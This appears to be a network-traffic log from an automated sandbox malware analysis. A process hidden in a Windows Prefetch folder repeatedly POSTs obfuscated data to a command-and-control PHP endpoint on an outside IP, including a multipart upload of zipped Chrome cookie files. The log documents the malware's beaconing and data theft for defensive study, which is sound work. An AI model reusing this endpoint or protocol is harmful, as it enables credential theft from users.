                                                            Content-Length: 1044
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Dec 10, 2024 07:33:33.907604933 CET1044OUTData Raw: 5a 53 5c 5f 5d 5b 56 5a 58 5f 51 55 5a 5e 58 56 56 51 58 55 56 5d 50 5f 50 56 5b 5c 53 5d 5b 5c 5c 45 56 54 5a 5c 50 53 59 5e 55 54 58 52 51 59 5a 5c 42 56 5a 5d 5a 5f 50 5b 55 5f 51 5a 58 5e 54 5d 5d 5e 5e 59 55 5c 5a 5b 5d 58 5f 5d 43 56 5c 59
                                                            Data Ascii: ZS\_][VZX_QUZ^XVVQXUV]P_PV[\S][\\EVTZ\PSY^UTXRQYZ\BVZ]Z_P[U_QZX^T]]^^YU\Z[]X_]CV\YR[TXX[STZ]^ZQU][YVR\G\Z[\UQ[\P[]XP]Z\Z_YXXRUB_YV]V\__][^_U[E^PSWQYSPT]YZASS^V^BYXX_ZXXPTZT_SXR[P_Z]Y_[!/!%A3=W U>,)13=+X+"4$(T*)+5C3<Z$8!^" \)-


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            14192.168.2.549931185.43.5.93806180C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 10, 2024 07:33:34.590481997 CET303OUTPOST /5/4Datalife/asynccpu3Generator/VmPipePollHttpgeoprocessserver.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                            Host: 185.43.5.93
                                                            Content-Length: 1764
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Dec 10, 2024 07:33:34.938826084 CET1764OUTData Raw: 5a 53 59 5b 5d 5d 56 5a 58 5f 51 55 5a 58 58 55 56 51 58 5f 56 5a 50 50 50 56 5b 5c 53 5d 5b 5c 5c 45 56 54 5a 5c 50 53 59 5e 55 54 58 52 51 59 5a 5c 42 56 5a 5d 5a 5f 50 5b 55 5f 51 5a 58 5e 54 5d 5d 5e 5e 59 55 5c 5a 5b 5d 58 5f 5d 43 56 5c 59
                                                            Data Ascii: ZSY[]]VZX_QUZXXUVQX_VZPPPV[\S][\\EVTZ\PSY^UTXRQYZ\BVZ]Z_P[U_QZX^T]]^^YU\Z[]X_]CV\YR[TXX[STZ]^ZQU][YVR\G\Z[\UQ[\P[]XP]Z\Z_YXXRUB_YV]V\__][^_U[E^PSWQYSPT]YZASS^V^BYXX_ZXXPTZT_SXR[P_Z]Y_[";=0%T##;$4+Y*!,7<9Q)89C'><Z&8!^" \)9
                                                            Dec 10, 2024 07:33:35.930350065 CET25INHTTP/1.1 100 Continue
                                                            Dec 10, 2024 07:33:36.163763046 CET349INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Tue, 10 Dec 2024 06:33:35 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            Vary: Accept-Encoding
                                                            Data Raw: 39 38 0d 0a 09 1f 26 58 23 3f 2c 13 25 02 38 0f 24 03 39 0f 28 34 22 16 2a 2c 04 5b 2b 1d 05 07 3f 06 31 11 21 34 20 5f 27 03 29 0d 33 01 35 0a 32 0e 2e 5e 0c 10 38 5b 21 3b 30 5a 2b 00 23 5a 3e 11 29 05 28 3f 24 03 31 05 30 02 27 03 28 04 30 06 25 17 30 02 22 05 3e 5f 2e 5b 3c 08 3b 0c 25 02 2e 56 0b 12 23 1f 3e 00 2b 06 33 03 09 56 3e 00 39 0c 22 39 22 11 37 02 23 11 21 38 03 07 3e 0b 28 5e 30 21 02 0c 24 2a 2c 5d 34 02 35 1b 27 22 24 50 2c 0d 28 55 03 3e 57 54 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 98&X#?,%8$9(4"*,[+?1!4 _')352.^8[!;0Z+#Z>)(?$10'(0%0">_.[<;%.V#>+3V>9"9"7#!8>(^0!$*,]45'"$P,(U>WT0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            15192.168.2.549932185.43.5.93806180C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 10, 2024 07:33:34.964966059 CET303OUTPOST /5/4Datalife/asynccpu3Generator/VmPipePollHttpgeoprocessserver.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                            Host: 185.43.5.93
                                                            Content-Length: 1048
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Dec 10, 2024 07:33:35.313838959 CET1048OUTData Raw: 5a 53 59 5f 5d 5f 56 5e 58 5f 51 55 5a 5c 58 5c 56 54 58 5f 56 50 50 5d 50 56 5b 5c 53 5d 5b 5c 5c 45 56 54 5a 5c 50 53 59 5e 55 54 58 52 51 59 5a 5c 42 56 5a 5d 5a 5f 50 5b 55 5f 51 5a 58 5e 54 5d 5d 5e 5e 59 55 5c 5a 5b 5d 58 5f 5d 43 56 5c 59
                                                            Data Ascii: ZSY_]_V^X_QUZ\X\VTX_VPP]PV[\S][\\EVTZ\PSY^UTXRQYZ\BVZ]Z_P[U_QZX^T]]^^YU\Z[]X_]CV\YR[TXX[STZ]^ZQU][YVR\G\Z[\UQ[\P[]XP]Z\Z_YXXRUB_YV]V\__][^_U[E^PSWQYSPT]YZASS^V^BYXX_ZXXPTZT_SXR[P_Z]Y_[!;%'35U7-8:5';[+=4?7+T%U)]!@3=X3!^" \))
                                                            Dec 10, 2024 07:33:36.321985006 CET25INHTTP/1.1 100 Continue
                                                            Dec 10, 2024 07:33:36.555479050 CET200INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Tue, 10 Dec 2024 06:33:36 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            Vary: Accept-Encoding
                                                            Data Raw: 34 0d 0a 3b 57 5f 54 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 4;W_T0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            16192.168.2.549937185.43.5.93806180C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 10, 2024 07:33:36.809101105 CET279OUTPOST /5/4Datalife/asynccpu3Generator/VmPipePollHttpgeoprocessserver.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                            Host: 185.43.5.93
                                                            Content-Length: 1048
                                                            Expect: 100-continue
                                                            Dec 10, 2024 07:33:37.157524109 CET1048OUTData Raw: 5a 52 5c 5d 58 5e 56 50 58 5f 51 55 5a 57 58 5d 56 55 58 58 56 59 50 5e 50 56 5b 5c 53 5d 5b 5c 5c 45 56 54 5a 5c 50 53 59 5e 55 54 58 52 51 59 5a 5c 42 56 5a 5d 5a 5f 50 5b 55 5f 51 5a 58 5e 54 5d 5d 5e 5e 59 55 5c 5a 5b 5d 58 5f 5d 43 56 5c 59
                                                            Data Ascii: ZR\]X^VPX_QUZWX]VUXXVYP^PV[\S][\\EVTZ\PSY^UTXRQYZ\BVZ]Z_P[U_QZX^T]]^^YU\Z[]X_]CV\YR[TXX[STZ]^ZQU][YVR\G\Z[\UQ[\P[]XP]Z\Z_YXXRUB_YV]V\__][^_U[E^PSWQYSPT]YZASS^V^BYXX_ZXXPTZT_SXR[P_Z]Y_[!/=$#4 =];*$>4?Y% /4+T9)'-X0!^" \)
                                                            Dec 10, 2024 07:33:38.135507107 CET25INHTTP/1.1 100 Continue


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            17192.168.2.549941185.43.5.93806180C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 10, 2024 07:33:38.148473978 CET348OUTPOST /5/4Datalife/asynccpu3Generator/VmPipePollHttpgeoprocessserver.php HTTP/1.1
                                                            Content-Type: multipart/form-data; boundary=----6Bb2TGQW3wrvnAZPjUVj3vIvEUSrxVXwXU
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                            Host: 185.43.5.93
                                                            Content-Length: 15834
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Dec 10, 2024 07:33:38.501379013 CET12360OUTData Raw: 2d 2d 2d 2d 2d 2d 36 42 62 32 54 47 51 57 33 77 72 76 6e 41 5a 50 6a 55 56 6a 33 76 49 76 45 55 53 72 78 56 58 77 58 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 30 22
                                                            Data Ascii: ------6Bb2TGQW3wrvnAZPjUVj3vIvEUSrxVXwXUContent-Disposition: form-data; name="0"Content-Type: text/plainZW\X]XV]X_QUZ\XVVWX\VXPPPV[\S][\\EVTZ\PSY^UTXRQYZ\BVZ]Z_P[U_QZX^T]]^^YU\Z[]X_]CV\YR[TXX[STZ]^ZQU][YVR\G\Z[\UQ[\P[]XP]Z\Z_YXXRUB_YV]
                                                            Dec 10, 2024 07:33:38.621037960 CET3474OUTData Raw: 49 51 41 6b 41 41 41 41 41 41 41 41 41 41 41 41 41 41 42 2f 41 77 41 41 51 6e 4a 76 64 33 4e 6c 63 6e 4d 76 51 32 39 76 61 32 6c 6c 63 31 74 44 61 48 4a 76 62 57 56 64 49 30 64 74 53 48 59 75 64 48 68 30 43 67 41 67 41 41 41 41 41 41 41 42 41 42
                                                            Data Ascii: IQAkAAAAAAAAAAAAAAB/AwAAQnJvd3NlcnMvQ29va2llc1tDaHJvbWVdI0dtSHYudHh0CgAgAAAAAAABABgATo05N9tL2wFOjTk320vbAU6NOTfbS9sBUEsBAi0AFAAACAgAlU2LWcCL6QjoAAAAIQEAACEAJAAAAAAAAAAAAAAAygQAAEJyb3dzZXJzL0Nvb2tpZXNbQ2hyb21lXSNCVHlwLnR4dAoAIAAAAAAAAQAYAE6NOTf
                                                            Dec 10, 2024 07:33:39.487857103 CET25INHTTP/1.1 100 Continue
                                                            Dec 10, 2024 07:33:39.723537922 CET200INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Tue, 10 Dec 2024 06:33:39 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            Vary: Accept-Encoding
                                                            Data Raw: 34 0d 0a 3b 57 5f 54 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 4;W_T0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            18192.168.2.549942185.43.5.93806180C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 10, 2024 07:33:38.296608925 CET303OUTPOST /5/4Datalife/asynccpu3Generator/VmPipePollHttpgeoprocessserver.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                            Host: 185.43.5.93
                                                            Content-Length: 1048
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Dec 10, 2024 07:33:38.642000914 CET1048OUTData Raw: 5f 55 5c 50 5d 59 53 58 58 5f 51 55 5a 5c 58 53 56 53 58 5e 56 51 50 50 50 56 5b 5c 53 5d 5b 5c 5c 45 56 54 5a 5c 50 53 59 5e 55 54 58 52 51 59 5a 5c 42 56 5a 5d 5a 5f 50 5b 55 5f 51 5a 58 5e 54 5d 5d 5e 5e 59 55 5c 5a 5b 5d 58 5f 5d 43 56 5c 59
                                                            Data Ascii: _U\P]YSXX_QUZ\XSVSX^VQPPPV[\S][\\EVTZ\PSY^UTXRQYZ\BVZ]Z_P[U_QZX^T]]^^YU\Z[]X_]CV\YR[TXX[STZ]^ZQU][YVR\G\Z[\UQ[\P[]XP]Z\Z_YXXRUB_YV]V\__][^_U[E^PSWQYSPT]YZASS^V^BYXX_ZXXPTZT_SXR[P_Z]Y_[!/5A'#1#3]/*X0- +?)R!<,+>C3- Y$8!^" \))
                                                            Dec 10, 2024 07:33:39.626898050 CET25INHTTP/1.1 100 Continue
                                                            Dec 10, 2024 07:33:39.859477043 CET200INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Tue, 10 Dec 2024 06:33:39 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            Vary: Accept-Encoding
                                                            Data Raw: 34 0d 0a 3b 57 5f 54 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 4;W_T0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            19192.168.2.549947185.43.5.93806180C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 10, 2024 07:33:40.103610039 CET279OUTPOST /5/4Datalife/asynccpu3Generator/VmPipePollHttpgeoprocessserver.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                            Host: 185.43.5.93
                                                            Content-Length: 1048
                                                            Expect: 100-continue
                                                            Dec 10, 2024 07:33:40.454638004 CET1048OUTData Raw: 5f 53 5c 51 5d 58 56 50 58 5f 51 55 5a 59 58 53 56 5a 58 55 56 5c 50 59 50 56 5b 5c 53 5d 5b 5c 5c 45 56 54 5a 5c 50 53 59 5e 55 54 58 52 51 59 5a 5c 42 56 5a 5d 5a 5f 50 5b 55 5f 51 5a 58 5e 54 5d 5d 5e 5e 59 55 5c 5a 5b 5d 58 5f 5d 43 56 5c 59
                                                            Data Ascii: _S\Q]XVPX_QUZYXSVZXUV\PYPV[\S][\\EVTZ\PSY^UTXRQYZ\BVZ]Z_P[U_QZX^T]]^^YU\Z[]X_]CV\YR[TXX[STZ]^ZQU][YVR\G\Z[\UQ[\P[]XP]Z\Z_YXXRUB_YV]V\__][^_U[E^PSWQYSPT]YZASS^V^BYXX_ZXXPTZT_SXR[P_Z]Y_[!/!E$)U !]/:Y'=$?<=V#7+>;&0>8X'(!^" \)


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            20192.168.2.549949185.43.5.93806180C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 10, 2024 07:33:41.293484926 CET303OUTPOST /5/4Datalife/asynccpu3Generator/VmPipePollHttpgeoprocessserver.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                            Host: 185.43.5.93
                                                            Content-Length: 1764
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Dec 10, 2024 07:33:41.641968966 CET1764OUTData Raw: 5a 54 59 5c 58 5a 53 5f 58 5f 51 55 5a 59 58 55 56 57 58 58 56 5b 50 59 50 56 5b 5c 53 5d 5b 5c 5c 45 56 54 5a 5c 50 53 59 5e 55 54 58 52 51 59 5a 5c 42 56 5a 5d 5a 5f 50 5b 55 5f 51 5a 58 5e 54 5d 5d 5e 5e 59 55 5c 5a 5b 5d 58 5f 5d 43 56 5c 59
                                                            Data Ascii: ZTY\XZS_X_QUZYXUVWXXV[PYPV[\S][\\EVTZ\PSY^UTXRQYZ\BVZ]Z_P[U_QZX^T]]^^YU\Z[]X_]CV\YR[TXX[STZ]^ZQU][YVR\G\Z[\UQ[\P[]XP]Z\Z_YXXRUB_YV]V\__][^_U[E^PSWQYSPT]YZASS^V^BYXX_ZXXPTZT_SXR[P_Z]Y_["X85$9 #*,2_$[?\(/)R7++2V*;!B&>?'(!^" \)
                                                            Dec 10, 2024 07:33:42.633164883 CET25INHTTP/1.1 100 Continue
                                                            Dec 10, 2024 07:33:42.867526054 CET349INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Tue, 10 Dec 2024 06:33:42 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            Vary: Accept-Encoding
                                                            Data Raw: 39 38 0d 0a 09 1f 25 02 37 11 2f 01 26 3b 09 55 27 3a 25 0c 2a 37 3d 07 3f 3c 0f 03 3c 20 3c 5a 2b 5e 39 59 21 37 28 16 24 2d 08 57 24 2f 00 53 24 34 2e 5e 0c 10 38 16 22 5e 3f 05 28 3e 05 11 3e 59 22 59 28 3f 24 02 26 2f 2b 10 26 39 34 02 27 28 31 19 25 2f 3d 5a 3e 00 25 05 3c 57 38 50 26 28 2e 56 0b 12 20 0f 3d 5f 24 5f 24 04 3f 54 2a 07 22 56 20 5c 31 01 37 05 27 5b 36 38 39 01 29 21 3c 5b 27 1f 0d 56 24 17 20 5a 37 2c 22 0e 32 22 24 50 2c 0d 28 55 03 3e 57 54 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 98%7/&;U':%*7=?<< <Z+^9Y!7($-W$/S$4.^8"^?(>>Y"Y(?$&/+&94'(1%/=Z>%<W8P&(.V =_$_$?T*"V \17'[689)!<['V$ Z7,"2"$P,(U>WT0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            21192.168.2.549950185.43.5.93806180C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 10, 2024 07:33:41.415687084 CET303OUTPOST /5/4Datalife/asynccpu3Generator/VmPipePollHttpgeoprocessserver.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                            Host: 185.43.5.93
                                                            Content-Length: 1044
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Dec 10, 2024 07:33:41.766963959 CET1044OUTData Raw: 5f 55 5c 51 5d 53 56 5d 58 5f 51 55 5a 5e 58 52 56 51 58 58 56 5b 50 5f 50 56 5b 5c 53 5d 5b 5c 5c 45 56 54 5a 5c 50 53 59 5e 55 54 58 52 51 59 5a 5c 42 56 5a 5d 5a 5f 50 5b 55 5f 51 5a 58 5e 54 5d 5d 5e 5e 59 55 5c 5a 5b 5d 58 5f 5d 43 56 5c 59
                                                            Data Ascii: _U\Q]SV]X_QUZ^XRVQXXV[P_PV[\S][\\EVTZ\PSY^UTXRQYZ\BVZ]Z_P[U_QZX^T]]^^YU\Z[]X_]CV\YR[TXX[STZ]^ZQU][YVR\G\Z[\UQ[\P[]XP]Z\Z_YXXRUB_YV]V\__][^_U[E^PSWQYSPT]YZASS^V^BYXX_ZXXPTZT_SXR[P_Z]Y_["85$#!35Z;9*X0>;\)?"!,Q+16)5'.<]$!^" \)
                                                            Dec 10, 2024 07:33:42.744828939 CET25INHTTP/1.1 100 Continue
                                                            Dec 10, 2024 07:33:42.979509115 CET200INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Tue, 10 Dec 2024 06:33:42 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            Vary: Accept-Encoding
                                                            Data Raw: 34 0d 0a 3b 57 5f 54 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 4;W_T0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            22192.168.2.549955185.43.5.93806180C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 10, 2024 07:33:43.227819920 CET279OUTPOST /5/4Datalife/asynccpu3Generator/VmPipePollHttpgeoprocessserver.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                            Host: 185.43.5.93
                                                            Content-Length: 1048
                                                            Expect: 100-continue
                                                            Dec 10, 2024 07:33:43.579487085 CET1048OUTData Raw: 5a 53 5c 5e 5d 5b 56 50 58 5f 51 55 5a 5c 58 5c 56 5b 58 5e 56 58 50 5f 50 56 5b 5c 53 5d 5b 5c 5c 45 56 54 5a 5c 50 53 59 5e 55 54 58 52 51 59 5a 5c 42 56 5a 5d 5a 5f 50 5b 55 5f 51 5a 58 5e 54 5d 5d 5e 5e 59 55 5c 5a 5b 5d 58 5f 5d 43 56 5c 59
                                                            Data Ascii: ZS\^][VPX_QUZ\X\V[X^VXP_PV[\S][\\EVTZ\PSY^UTXRQYZ\BVZ]Z_P[U_QZX^T]]^^YU\Z[]X_]CV\YR[TXX[STZ]^ZQU][YVR\G\Z[\UQ[\P[]XP]Z\Z_YXXRUB_YV]V\__][^_U[E^PSWQYSPT]YZASS^V^BYXX_ZXXPTZT_SXR[P_Z]Y_[!,T:&3V7U)[,*'=\(=4<,(!9U=+E$ Y$!^" \))
                                                            Dec 10, 2024 07:33:44.566890001 CET25INHTTP/1.1 100 Continue
                                                            Dec 10, 2024 07:33:44.799963951 CET200INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Tue, 10 Dec 2024 06:33:44 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            Vary: Accept-Encoding
                                                            Data Raw: 34 0d 0a 3b 57 5f 54 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 4;W_T0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            23192.168.2.549959185.43.5.93806180C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 10, 2024 07:33:45.047045946 CET303OUTPOST /5/4Datalife/asynccpu3Generator/VmPipePollHttpgeoprocessserver.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                            Host: 185.43.5.93
                                                            Content-Length: 1044
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Dec 10, 2024 07:33:45.391974926 CET1044OUTData Raw: 5f 54 5c 5c 5d 5b 56 5e 58 5f 51 55 5a 5e 58 52 56 56 58 5c 56 5d 50 5c 50 56 5b 5c 53 5d 5b 5c 5c 45 56 54 5a 5c 50 53 59 5e 55 54 58 52 51 59 5a 5c 42 56 5a 5d 5a 5f 50 5b 55 5f 51 5a 58 5e 54 5d 5d 5e 5e 59 55 5c 5a 5b 5d 58 5f 5d 43 56 5c 59
                                                            Data Ascii: _T\\][V^X_QUZ^XRVVX\V]P\PV[\S][\\EVTZ\PSY^UTXRQYZ\BVZ]Z_P[U_QZX^T]]^^YU\Z[]X_]CV\YR[TXX[STZ]^ZQU][YVR\G\Z[\UQ[\P[]XP]Z\Z_YXXRUB_YV]V\__][^_U[E^PSWQYSPT]YZASS^V^BYXX_ZXXPTZT_SXR[P_Z]Y_["]-!*$9U7)X,3\<<!7<(2=P*;C$=;'8!^" \)
                                                            Dec 10, 2024 07:33:46.394697905 CET25INHTTP/1.1 100 Continue
                                                            Dec 10, 2024 07:33:46.642616987 CET200INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Tue, 10 Dec 2024 06:33:46 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            Vary: Accept-Encoding
                                                            Data Raw: 34 0d 0a 3b 57 5f 54 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 4;W_T0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            24192.168.2.549964185.43.5.93806180C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 10, 2024 07:33:46.890717983 CET303OUTPOST /5/4Datalife/asynccpu3Generator/VmPipePollHttpgeoprocessserver.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                            Host: 185.43.5.93
                                                            Content-Length: 1048
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Dec 10, 2024 07:33:47.235654116 CET1048OUTData Raw: 5f 54 5c 51 58 5a 56 59 58 5f 51 55 5a 5a 58 57 56 56 58 5b 56 5a 50 51 50 56 5b 5c 53 5d 5b 5c 5c 45 56 54 5a 5c 50 53 59 5e 55 54 58 52 51 59 5a 5c 42 56 5a 5d 5a 5f 50 5b 55 5f 51 5a 58 5e 54 5d 5d 5e 5e 59 55 5c 5a 5b 5d 58 5f 5d 43 56 5c 59
                                                            Data Ascii: _T\QXZVYX_QUZZXWVVX[VZPQPV[\S][\\EVTZ\PSY^UTXRQYZ\BVZ]Z_P[U_QZX^T]]^^YU\Z[]X_]CV\YR[TXX[STZ]^ZQU][YVR\G\Z[\UQ[\P[]XP]Z\Z_YXXRUB_YV]V\__][^_U[E^PSWQYSPT]YZASS^V^BYXX_ZXXPTZT_SXR[P_Z]Y_[!,T6$3Q##Z;9!3=3\+?W +)5E0#'!^" \)1


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            25192.168.2.549967185.43.5.93806180C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 10, 2024 07:33:47.997967958 CET303OUTPOST /5/4Datalife/asynccpu3Generator/VmPipePollHttpgeoprocessserver.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                            Host: 185.43.5.93
                                                            Content-Length: 1764
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Dec 10, 2024 07:33:48.345115900 CET1764OUTData Raw: 5a 55 5c 58 58 5e 56 5e 58 5f 51 55 5a 56 58 54 56 53 58 5a 56 50 50 50 50 56 5b 5c 53 5d 5b 5c 5c 45 56 54 5a 5c 50 53 59 5e 55 54 58 52 51 59 5a 5c 42 56 5a 5d 5a 5f 50 5b 55 5f 51 5a 58 5e 54 5d 5d 5e 5e 59 55 5c 5a 5b 5d 58 5f 5d 43 56 5c 59
                                                            Data Ascii: ZU\XX^V^X_QUZVXTVSXZVPPPPV[\S][\\EVTZ\PSY^UTXRQYZ\BVZ]Z_P[U_QZX^T]]^^YU\Z[]X_]CV\YR[TXX[STZ]^ZQU][YVR\G\Z[\UQ[\P[]XP]Z\Z_YXXRUB_YV]V\__][^_U[E^PSWQYSPT]YZASS^V^BYXX_ZXXPTZT_SXR[P_Z]Y_[",$ &.:1$-<<<6 Z,+=T)5$?'(!^" \)
                                                            Dec 10, 2024 07:33:49.337601900 CET25INHTTP/1.1 100 Continue
                                                            Dec 10, 2024 07:33:49.571682930 CET349INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Tue, 10 Dec 2024 06:33:49 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            Vary: Accept-Encoding
                                                            Data Raw: 39 38 0d 0a 09 1f 26 5c 20 11 2f 05 25 5d 37 1c 30 3a 0c 50 3f 27 08 1b 28 12 3a 5d 3c 23 38 19 2b 28 3a 00 20 24 09 07 30 13 25 0d 27 3c 39 0c 24 24 2e 5e 0c 10 38 5c 21 28 27 02 3f 3e 28 06 3d 01 32 13 28 2f 3c 02 25 2c 27 1f 27 39 24 00 24 06 17 50 27 12 26 01 2a 39 2e 11 3f 21 20 57 31 02 2e 56 0b 12 23 1c 3e 07 30 5e 26 3d 33 1e 28 3e 2d 0b 22 3a 2a 1e 20 2c 06 04 35 3b 32 12 2a 54 2b 02 30 21 06 0a 24 00 38 14 23 3c 29 53 31 22 24 50 2c 0d 28 55 03 3e 57 54 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 98&\ /%]70:P?'(:]<#8+(: $0%'<9$$.^8\!('?>(=2(/<%,''9$$P'&*9.?! W1.V#>0^&=3(>-":* ,5;2*T+0!$8#<)S1"$P,(U>WT0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            26192.168.2.549969185.43.5.93806180C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 10, 2024 07:33:48.117922068 CET303OUTPOST /5/4Datalife/asynccpu3Generator/VmPipePollHttpgeoprocessserver.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                            Host: 185.43.5.93
                                                            Content-Length: 1048
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
